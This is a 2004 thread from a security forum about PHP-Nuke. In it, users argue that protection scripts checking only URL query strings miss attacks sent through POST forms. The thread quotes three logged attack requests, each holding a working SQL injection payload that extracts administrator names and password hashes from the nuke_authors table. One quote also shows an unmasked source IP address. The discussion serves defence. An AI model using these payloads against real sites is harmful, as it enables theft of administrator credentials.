Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 124
Members: 0
Total: 124
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> Caution, fortress & co are useless
Post new topicReply to topic View previous topic :: View next topic
Caution, fortress & co are useless
PostPosted: Sun Jun 06, 2004 10:11 am Reply with quote
Tora
Regular user
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany




Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.xxx.xxx.xxx
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report over an older version of fortress. In addition, most described applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in german language...

best wishes and greetings from germany
Andi (aka Tora)


Last edited by Tora on Mon Jun 07, 2004 12:09 am; edited 1 time in total
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 06, 2004 11:16 am Reply with quote
SteX
Advanced user
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia




I never installed that shits of protect .. Smile

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Sun Jun 06, 2004 2:36 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




Quote:
As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.



Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 06, 2004 4:00 pm Reply with quote
Tora
Regular user
Regular user
Joined: May 19, 2004
Posts: 9
Location: Germany




Quote:
Script Kiddie

Question Question Who is the script kiddie Question Question

_________________
Greetings from Germany
Andi aka Tora, SiteAdmin @ pragmamx.org pragmaMx developer-team
View user's profile Send private message Visit poster's website
PostPosted: Sun Jun 06, 2004 5:35 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Tora knows the stuff, its obvious from his posts. Scriptkiddies are beginners, who are learned, how to USE exploits, but they are not YET understanding fully, how it works. Tora has by my opinion advanced knowledge/skills in phpnuke/mysql and other stuff, he/she is definately not a scriptkiddie Cool Wink


argentino wrote:
Quote:
As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.



Script Kiddie


A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability
View user's profile Send private message Send e-mail Visit poster's website
Re: Caution, fortress & co are useless
PostPosted: Sun Jun 06, 2004 5:39 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yes, you are absolutely right - sanityzing only the GET parameters/QUERY string is useless and POST and COOKIE variables must be sanitized too. Because phpnuke globalizes all the GET/POST/COOKIE parameters and its not hard to attacker to inject mailicious requests through COOKIE for example...
I suggest to use Sentinel protection system. Its my favorite in this moment and it will add good security layer between potential attackers and website.

Tora wrote:
Here are 3 examples from our detection log files:
Quote:
request:
_GET[name] = Encyclopedia
_POST[file] = search
_POST[query] = -1' UNION SELECT 0,pwd FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=Encyclopedia
REQUEST_URI: /modules.php?name=Encyclopedia
Quote:
request:
_GET[name] = Journal
_POST[file] = search
_POST[disp] = search
_POST[bywhat] = aid
_POST[forwhat] = -1' UNION SELECT 0,0,aid,pwd,0,0,0,0,0 FROM nuke_authors/*
_COOKIE[lastvisita] = 1086277415
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=Journal
REQUEST_URI: /modules.php?name=Journal
Quote:
request:
_GET[name] = FAQ
_POST[myfaq] = yes
_POST[id_cat] = -1' UNION SELECT 0,0,aid,pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR: 82.142.140.62
QUERY_STRING: name=FAQ
REQUEST_URI: /modules.php?name=FAQ

As you can see, the hackers do not attack over the URL. They dispatch
the data over a form by using Post. All safety systems like fortress, which examine only the Getvars (_SERVER['query_string']), are therefore useless.

Here is a critical report over an older version of fortress. In addition, most described applies to the new version.
http://vkp.shiba.de/doku/fortress.htm
Sorry, only in german language...

best wishes and greetings from germany
Andi (aka Tora)
View user's profile Send private message Send e-mail Visit poster's website
Caution, fortress & co are useless
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.040 Seconds